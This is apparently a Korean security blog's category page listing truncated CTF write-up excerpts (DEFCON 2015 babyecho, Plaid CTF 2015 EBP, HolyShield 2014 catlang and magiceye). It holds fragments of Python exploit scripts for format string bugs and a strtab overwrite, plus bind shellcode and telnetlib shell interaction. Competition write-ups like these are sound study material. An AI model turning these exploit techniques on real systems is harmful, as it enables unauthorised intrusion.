본문 바로가기
반응형

Security/[게임] CTF 풀이56

[exploit] DEFCON CTF Qualifier 2015, babyecho Writeups [+[ Format String Bug #!/usr/bin/env python import socket import struct import telnetlib p = lambda x: struct.pack( " 2015. 5. 18.
[exploit] Plaid CTF 2015 EBP writeup [+] keyword : double format string bug, overwrite ebp [!] 코드가 많이 복잡합니다 ㅎㅎ 그래도 코드만 올릴게요 :D [!] 쉘코드는 bind shellcode를 이용하여 1337번 포트로 재접속하는 쉘코드를 사용했습니다. #!/usr/bin/env python import struct import socket import time import telnetlib p = lambda x: struct.pack( "I", x )[0] host = "52.6.64.173" port = 4545 # bind shellcode # ip : 0.0.0.0, port : 1337 shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90" sh.. 2015. 4. 24.
[exploit] 홀리쉴드 2014 catlang writeups 와...일단 풀이 올리기 전에 굉장한 기술문서를 작성한 pwn3r님 감사드리면서 기술문서도 함께 올리겠습니다... 기술문서 요약 : dynamic에 쓰기권한이 있을 때 strtab부분을 수정하여 원하는 함수를 호출할 수 있다. #!/usr/bin/env python import socket import struct import telnetlib p = lambda x: struct.pack( "> " ) s.send( pay ) print 'sh #' t = telnetlib.Telnet() t.sock = s t.interact() 2014. 11. 28.
[misc] 홀리쉴드 2014 magiceye writeup ======================================================================= 문제파일을 HxD로 열어보면 zip파일 시그니처가 들어있습니다. zip파일을 추출하여 안의 파일을 보면 다음과 같습니다. 압축파일 내부의 파일 중에서 봐야할 이미지는 “fd1f96373b509c826add83a11020ea8d - copied.BMP”, “fd1f96373b509c826add83a11020ea8d.BMP"입니다. 이 두 이미지는 같은 이미지같지만 hash를 보면 다른 것을 알 수 있습니다. fd1 = open( "fd1f96373b509c826add83a11020ea8d - copied.BMP", "rb" ) fd2 = open( "fd1f96.. 2014. 11. 25.
728x90